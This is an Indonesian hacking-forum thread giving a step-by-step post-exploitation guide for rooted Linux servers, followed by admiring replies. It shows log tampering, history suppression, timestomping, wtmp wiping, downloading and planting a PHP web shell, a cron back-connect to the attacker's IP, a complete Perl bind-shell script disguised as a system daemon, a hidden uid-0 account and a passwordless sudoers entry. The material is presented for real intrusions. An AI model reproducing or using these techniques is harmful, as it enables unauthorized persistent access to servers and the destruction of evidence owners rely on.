Beberapa Tindakan setelah R00t3d sebuah mesin

Pengunjung Jumlah posting : 19 Join date : 24.05.09

Yup abis seneng2 :

Beberapa Tindakan setelah R00t3d sebuah mesin Spawn

setelah atau sesudah atau after kita mendapat akses root, berikut ini sample tindak lanjut yg bisa kita lakukan:

Teknik Teknik Covering Tracks dan Mengawetkan Akses Root

Code:: regards to: cakrabirawa, odybx, synomadeous

Beberapa tips praktis Setelah berhasil ngeroot box utk cover track:
-1. Edit Log dan Touch Date
Beberapa log2 umum bisa dilihat di /var/log :

Code:: bash-3.00# cd /var/log
bash-3.00# ls -la
total 73688
drwxr-xr-x 9 root root 4096 Jun 19 21:14 .
drwxr-xr-x 20 root root 4096 Jun 13 12:31 ..
drwxr-x--- 2 root root 4096 Apr 18 04:26 audit
drwxr-xr-x 4 root root 4096 Mar 1 10:08 bandwidth
-rw------- 1 root root 5610 Jun 19 13:36 boot.log
-rw------- 1 root root 808 Jun 5 08:43 boot.log.1
-rw------- 1 root root 0 May 24 00:15 boot.log.2
-rw------- 1 root root 450 May 22 16:01 boot.log.3
-rw------- 1 root root 5248 May 12 23:22 boot.log.4
-rw-r--r-- 1 root root 22956222 Jun 20 00:06 chkservd.log
-rw-r--r-- 1 root root 907882 Sep 3 2008 cpanel-install-thread0.log
-rw-r--r-- 1 root root 106 Sep 3 2008 cpanel-install-thread1.log
-rw-r--r-- 1 root root 358 Jun 13 14:41 cpupdate.env
-rw------- 1 root root 2225284 Jun 13 14:43 cron
-rw------- 1 root root 2949422 Jun 7 00:15 cron.1
-rw------- 1 root root 2949102 May 31 00:15 cron.2
-rw------- 1 root root 2948712 May 24 00:15 cron.3
-rw------- 1 root root 2919868 May 17 00:15 cron.4
drwx------ 4 root root 4096 Jun 13 14:43 dcpumon
-rw-r--r-- 1 root root 0 Sep 3 2008 dmesg
-rw-r----- 1 mailnull mail 601652 Jun 19 23:20 exim_mainlog
-rw-r----- 1 mailnull mail 14467 Jun 7 00:15 exim_mainlog.1.gz
-rw-r----- 1 mailnull mail 13372 May 31 00:15 exim_mainlog.2.gz
-rw-r----- 1 mailnull mail 13240 May 24 00:15 exim_mainlog.3.gz
-rw-r----- 1 mailnull mail 12153 May 17 00:15 exim_mainlog.4.gz
-rw-r----- 1 mailnull mail 0 Jun 7 00:15 exim_paniclog
-rw-r----- 1 mailnull mail 88 Jun 7 00:15 exim_paniclog.1.gz
-rw-r----- 1 mailnull mail 20 May 31 00:15 exim_paniclog.2.gz
-rw-r----- 1 mailnull mail 20 May 24 00:15 exim_paniclog.3.gz
-rw-r----- 1 mailnull mail 20 May 17 00:15 exim_paniclog.4.gz
-rw-r----- 1 mailnull mail 45658 Jun 19 21:47 exim_rejectlog
-rw-r----- 1 mailnull mail 3649 Jun 7 00:15 exim_rejectlog.1.gz
-rw-r----- 1 mailnull mail 3340 May 31 00:15 exim_rejectlog.2.gz
-rw-r----- 1 mailnull mail 2829 May 24 00:15 exim_rejectlog.3.gz
-rw-r----- 1 mailnull mail 3220 May 17 00:15 exim_rejectlog.4.gz
drwxr-xr-x 2 root root 4096 Mar 1 10:08 httpd
-rw-r--r-- 1 root root 0 Jun 19 21:14 lastlog
drwxr-xr-x 2 root root 4096 Sep 3 2008 mail
-rw------- 1 root root 6396414 Jun 20 00:05 maillog
-rw------- 1 root root 2946608 Jun 7 00:12 maillog.1
-rw------- 1 root root 2916630 May 31 00:12 maillog.2
-rw------- 1 root root 3003586 May 24 00:13 maillog.3
-rw------- 1 root root 2862309 May 17 00:14 maillog.4
-rw-r--r-- 1 root root 9074726 Jun 20 00:10 messages
-rw-r--r-- 1 root root 3958 Apr 2 13:05 messages.1
-rw-r--r-- 1 root root 3958 Mar 7 13:05 messages.2
-rw-r--r-- 1 root root 3958 Apr 2 13:05 messages.3
-rw-r--r-- 1 root root 3958 Mar 7 13:05 messages.4
drwxr-xr-x 2 root root 4096 Jun 12 00:00 sa
drwx------ 2 root root 4096 Jul 26 2008 samba
-rw------- 1 root root 9313540 Jun 20 00:10 secure
-rw------- 1 root root 0 Jun 7 00:15 spooler
-rw------- 1 root root 0 May 31 00:15 spooler.1
-rw------- 1 root root 0 May 24 00:15 spooler.2
-rw------- 1 root root 0 May 17 00:15 spooler.3
-rw------- 1 root root 0 May 10 00:15 spooler.4
-rw-r--r-- 1 root root 47276 Sep 11 2008 stunnel-4.15-build.log
-rw-r--r-- 1 root root 13824 Jun 19 21:12 wtmp
-rw-rw-r-- 1 root utmp 13824 Jun 19 21:12 wtmp.1
lrwxrwxrwx 1 root root 41 Sep 4 2008 xferlog -> ../../usr/local/apache/domlogs/ftpxferlog
-rw-r--r-- 1 root root 2 Jun 13 14:43 xferlog.offset
-rw-r--r-- 1 root root 23165 Jun 13 15:20 yum.log
bash-3.00#

jika anda masuk ke server melalui suntikan url (sqli,blind,lfi,rfi,cgi attack) maka carilah letak file access_log dan segera edit utk menghilangkan bekas suntikan Anda

0. Di direktori /root biasanya ada folder .ssh, di dalamnya biasanya ada file known_hosts, baca file tsb utk melihat akses root ini di server lain

1. Periksa tingkat kemahiran root asli dg : cat .bash_history; utk root yg tidak lihai segera gandakan privilege dengan menambah user dg uid root misal:

Code:: adduser -u -o 0 .mywisdom

2. Stop log history
jika root asli lihai gunakan command ini:

Code:: unset HISTFILE; unset SAVEHIST

utk root asli yg ecek 2 (gak jago linux), gunakan command ini:

Code:: rm -f .bash_history & ln -s /dev/null .bash_history

(.bash history merupakan simbolik link /dev/null)

cara lain:
[sub]kopi .bash_history asli ke suatu direktori hidden misal :

buat direktori hidden di /tmp
misal dg nama direktori ... (tiga titik)
contoh:

Code:: -bash-3.00# cd /tmp;mkdir ...;cd ...;cp /root/.bash_history .bash_history
-bash-3.00# nano syslogd

isi syslogd (gunakan nama yg tidak mencurigakan, misal nama daemon)
misal isi file syslogd:

Code:: # !/bin/sh
while [ "$INPUT_STRING" != "bye" ]
do
cp /tmp/.../.bash_history /root
touch -t 0903071305 /root/.bash_history
done

Code:: -bash-3.00# chmod +x syslogd
-bash-3.00#./syslogd &

menjalankan syslogd palsu di bg

3. Modifikasi Tanggal File
misal di direktori root:

Code:: -bash-3.00# ls -la
total 120
drwxr-x--- 11 root root 4096 Feb 21 13:05 .
drwxr-xr-x 27 root root 4096 Feb 21 13:05 ..
-rw-r----- 1 root root 6963 Jun 12 13:05 .bash_history
-rw-r--r-- 1 root root 24 Jun 12 2005 .bash_logout
-rw-r--r-- 1 root root 191 Feb 21 2005 .bash_profile
-rw-r--r-- 1 root root 176 Feb 21 2005 .bashrc
drwxr-xr-x 4 root root 4096 Mar 1 10:09 .cpanel
drwxr-xr-x 4 root root 4096 Mar 1 10:08 cpanel3-skel
drwx------ 5 root root 4096 Mar 1 10:36 .cpobjcache
-rw-r--r-- 1 root root 100 Feb 21 2005 .cshrc
-rw-r--r-- 1 root root 309 May 1 06:48 filename
-rw-r--r-- 1 root root 24 Apr 1 07:33 .forward
drwx------ 2 root root 4096 Jun 12 13:05 .ssh
-bash-3.00#

sebelumnya tanggal awal file .bash_history , .bash_logout, .ssh adl 7 Maret jam 13:05,
lakukan modif tanggal semua file2 tsb ke tanggal awal 7 Mrt:

Code:: touch -t 0903071305 .bash_history
touch -t 0903071305 .bash_logout
touch -t 0903071305 .ssh

09=th 2009
03=bulan maret
07=tanggal 7
13=jam 13
05=lewat 5 menit

lakukan juga modif date di file 2 log di /var/log

4. clear wtmp

Code:: -bash-3.00# wget http://packetstormsecurity.org/UNIX/penetration/log-wipers/wzap.c
--07:54:31-- http://packetstormsecurity.org/UNIX/penetration/log-wipers/wzap.c
=> `wzap.c'
Resolving packetstormsecurity.org... 76.74.9.19
Connecting to packetstormsecurity.org|76.74.9.19|:80... connected.
HTTP request sent, awaiting response... 200 OK
Length: 972 [text/x-csrc]

100%[=======================================================================================================>] 972 --.--K/s

07:54:31 (84.27 MB/s) - `wzap.c' saved [972/972]

-bash-3.00# gcc -o wzap wzap.c
wzap.c:34:9: warning: unknown escape sequence '\o'
-bash-3.00# ls
rootkitutil.h vanish2.c vanish2.tgz wzap wzap.c
-bash-3.00# cp wzap /var/log
-bash-3.00# cd /var/log
-bash-3.00# ls
audit cpanel-install-thread1.log exim_mainlog exim_paniclog.4.gz mail messages.3 stunnel-4.15-build.log
bandwidth cpupdate.env exim_mainlog.1.gz exim_rejectlog maillog messages.4 wtmp
boot.log cron exim_mainlog.2.gz exim_rejectlog.1.gz maillog.1 sa wtmp.1
boot.log.1 cron.1 exim_mainlog.3.gz exim_rejectlog.2.gz maillog.2 samba wzap
boot.log.2 cron.2 exim_mainlog.4.gz exim_rejectlog.3.gz maillog.3 spooler xferlog
boot.log.3 cron.3 exim_paniclog exim_rejectlog.4.gz maillog.4 spooler.1 xferlog.offset
boot.log.4 cron.4 exim_paniclog.1.gz httpd messages spooler.2 yum.log
chkservd.log dcpumon exim_paniclog.2.gz lastlog messages.1 spooler.3
cpanel-install-thread0.log dmesg exim_paniclog.3.gz lastlog.save messages.2 spooler.4
-bash-3.00# ./wzap

Enter username to zap from the wtmp: root

opening file...
opening output file...
working...
-bash-3.00# ./wzap

Enter username to zap from the wtmp: .mywisdom

opening file...
opening output file...
working...
-bash-3.00# ./wzap

Enter username to zap from the wtmp: peter

opening file...
opening output file...
working...
-bash-3.00# ./wzap

Enter username to zap from the wtmp: whm

opening file...
opening output file...
working...
-bash-3.00# ./wzap

Enter username to zap from the wtmp: nobody

opening file...
opening output file...
working...
-bash-3.00# ./wzap

Enter username to zap from the wtmp: apache

opening file...
opening output file...
working...

-bash-3.00# mv wtmp.out wtmp & mv wtmp.out wtmp.1
-bash-3.00# rm -f wzap

5. Edit /var/log/messages dan log2 lain (terutama access_log)
setelah itu langsung set datenya ke awal

6. baca /etc/xinetd.conf
utk melihat seting 2 log daemon

________________________

Pengunjung Jumlah posting : 19 Join date : 24.05.09

Planting Backdoors

Ok setelah melakukan sedikit covering tracks di box yg sudah diroot, biasanya attacker akan melakukan penanaman backdoor dan mempersulit attacker lain masuk ke dalam dengan mempersulit pemasangan backdoor di server.

seperti biasa remover ini berupa sh (shell scripting), misal diberi nama xinetd
dg isi file sbb:

Code:: # !/bin/sh
while [ "$INPUT_STRING" != "bye" ]
do
find /home/ -name "*".php -type f -print0 | xargs -0 grep c99 | uniq -c | sort -u | cut -d":" -f1 | awk '{print "rm -rf " $2}' | uniq

find /home/ -name "*".php -type f -print0 | xargs -0 grep r57 | uniq -c | sort -u | cut -d":" -f1 | awk '{print "rm -rf " $2}' | uniq
done

penjelasan:

Code:: find /home/ -name "*".php -type f -print0 | xargs -0 grep c99 | uniq -c | sort -u | cut -d":" -f1 | awk '{print "rm -rf " $2}' | uniq

mencari dan mendelete c99 di direktori website di /home (krn direktori web ada di /home/nama_user/public_html), lalu dengan awk mendelete c99 shell

simpan di direktori yg tersembunyi, misal di /tmp/... :

Code:: bt ~ # ssh whm@xxxxxxxxxx.com
whm@xxxxxxxxxxxx.com's password:
Last login: Fri Jun 12 10:06:03 2009 from 118.136.147.202
Could not chdir to home directory /home/whm: No such file or dir ectory
-bash-3.00# cd /tmp/...
-bash-3.00# nano xinetd
-bash-3.00# chmod +x xinetd
-bash-3.00# ./xinetd &
[1] 26313
-bash-3.00#

di mana xinetd palsu itu akan kita run di background process sehingga akan run terus menerus utk menghapus setiap c99 dan r57 yg baru diupload

Planting Backdoors

Selanjutnya adl memasang aneka macam backdoor
1. planting php shell (b374k.php)
utk kesempatan kali ini kita akan menggunakan b374k.php

Code:: [root@vps776 shoutimages]# pwd
/home/xxxxxxxxxxx/www/smetag/shoutimages
[root@vps776 shoutimages]# mkdir ...
[root@vps776 shoutimages]# cd ...;wget http://tools.kerinci.net/download/b374k-1.0.tar.gz; tar zxvf b374k-1.0.tar.gz
--11:43:03-- http://tools.kerinci.net/download/b374k-1.0.tar.gz
=> `b374k-1.0.tar.gz'
Resolving tools.kerinci.net... 174.37.227.204
Connecting to tools.kerinci.net|174.37.227.204|:80... connected.
HTTP request sent, awaiting response... 200 OK
Length: 11,360 (11K) [application/x-gzip]

100%[=======================================================================================================>] 11,360 19.43K/s

11:43:05 (19.39 KB/s) - `b374k-1.0.tar.gz' saved [11360/11360]

b374k.php
readme.txt
[root@vps776 ...]# rm -f readme.txt mv b374k.php .library.php

2. Membuat Auto Backdooring time dg Crontab
Selanjutnya pasang upload bc atau ssh door ke server, misal di sini menggunakan bc yang akan dirun oleh cron setiap pukul 20:00 tiap malam

Selanjutnya attacker bisa juga membuat auto backdoor berdasarkan waktu dg menggunakan crontab:

Code:: [root@vps776 ...]# EDITOR=nano
[root@vps776 ...]# export EDITOR
[root@vps776 ...]# crontab -e
crontab: installing new crontab

di mana yg ditambah misal adl line ini:

Code:: 30 20 * * * /tmp/.../bc alamat_ip_kita_taruh_di_sini 3335

yup dengan penambahan line di atas pada crontab maka back connect akan dikirim ke port 3335 kita tiap pukul 20:00 (jam server)

sehingga setiap pukul 20:00 kita bisa menerima koneksi dari server tiap harinya dg listening nc di port 3335:

Code:: bt ~ # nc -l -p 3335 -vvv
listening on [any] 3335 ...
ip_server: inverse host lookup failed: Unknown host
connect to [ip_kita] from (UNKNOWN) [ip_server] 59569

why?

ini berguna jika suatu hari kita kehilangan akses ssh dan akses php shell di server maka tiap pukul 20:00 malam kita tetap bisa masuk ke server melalui back connect yang sudah kita install di crontab

3. Intalasi Linux Trojan& Lain2 Rootkit
Beberapa contoh linux trojan yang bisa Anda install di server bisa dilihat di:
http://www2.packetstormsecurity.org/cgi-bin/search/search.cgi?searchvalue=rootkit&type=archives&%5Bsearch%5D.x=0&%5Bsearch%5D.y=0
Tinggal dipilih

4. Pasang Fake Passworder
fake passworder pernah saya buat
http://web.archive.org/web/20041014202326/www.solhack.ath.cx/tools.html

fake passworder ini utk membelokkan password dan kemudian disimpan di /tmp

5. Pasang Bind Port

misal kita pakai bdp dari bind portnya b374k.php:

Code:: #!/usr/bin/perl -w
#whereis perl
$SHELL="/bin/bash -i";
if (@ARGV < 1) { exit(1); }
$LISTEN_PORT=$ARGV[0];
use Socket;
$protocol=getprotobyname('tcp');
socket(S,&PF_INET,&SOCK_STREAM,$protocol) || die "Cant create socket\n";
setsockopt(S,SOL_SOCKET,SO_REUSEADDR,1);
bind(S,sockaddr_in($LISTEN_PORT,INADDR_ANY)) || die "Cant open port\n";
listen(S,3) || die "Cant listen port\n";
while(1)
{
accept(CONN,S);
if(!($pid=fork))
{
die "Cannot fork" if (!defined $pid);
open STDIN,"<&CONN";
open STDOUT,">&CONN";
open STDERR,">&CONN";
exec $SHELL || die print CONN "Cant execute $SHELL\n";
close CONN;
exit 0;
}
}

kita simpan lagi di server target dg nama bdp di direktori /tmp/... (misal)

kita buat file sh di direktori /tmp/... dg isi yg menjalankan bdp tadi utk bind shell:
misal isinya:

Code:: # !/bin/sh
while [ "$INPUT_STRING" != "bye" ]
do
./bdp 777
done

misal disimpan dg nama: ntpd ( seolah olah adl network time protocol daemon)

lalu kita run di background:

Code:: ./ntpd &

utk listen port di server di port 777

Selanjutnya kita bisa akses tiap saat server ini dg netcat:

Code:: bt ~ # nc alamat_ip_server 777
bash: no job control in this shell
bash-3.00# uname -a
Linux vps776.xxxxxxx.com 2.6.18-028stab062.3 #1 SMP Thu Mar 26 14:46:38 MSK 2009 x86_64 x86_64 x86_64 GNU/Linux
bash-3.00#

Tips Tambahan:
Untuk mengawetkan akses bisa juga dengan mengedit file sudoers (bisA dilakukan dg visudo atau nano atau pico)

tambahkan line ini utk privilege sudo:

Code:: apache ALL=(ALL) NOPASSWD: ALL

keterangan apache hanyalah sample user saja , intinya adl menambahkan user yg menjalankan skrip php (bisa apache, atau www-data, atau nobody) tergantung setting httpd

Pengunjung Jumlah posting : 19 Join date : 29.05.09

asyik!!!
akhir moderator kita ngpos jg di sini..

alien

waaaaaaaaaaaaahhhhhhhhhhh....
ini dya yang aku tunggu"...
kaka master kembali ke forum devilzc0de !
bweheheheheee....
lol!

i have waiting for this mywisdom...

geek

Pengunjung Jumlah posting : 19 Join date : 24.05.09

weks bisaan aja nih master gunslinger btw mantap devilzc0de.plnya

hahahahaaa....
kaka, aku mah gg bisa apah"....
aku mau belajar sama kaka wisdom boleh gg ?
oiya, btw, kalo boleh tanya siapa tuh alabala kaka...?
=D

lucu kaka pass aku baca postingan di darkc0de....
my box has been rooted by lord majesty mywisdom......

hahahahahahaha.....
=D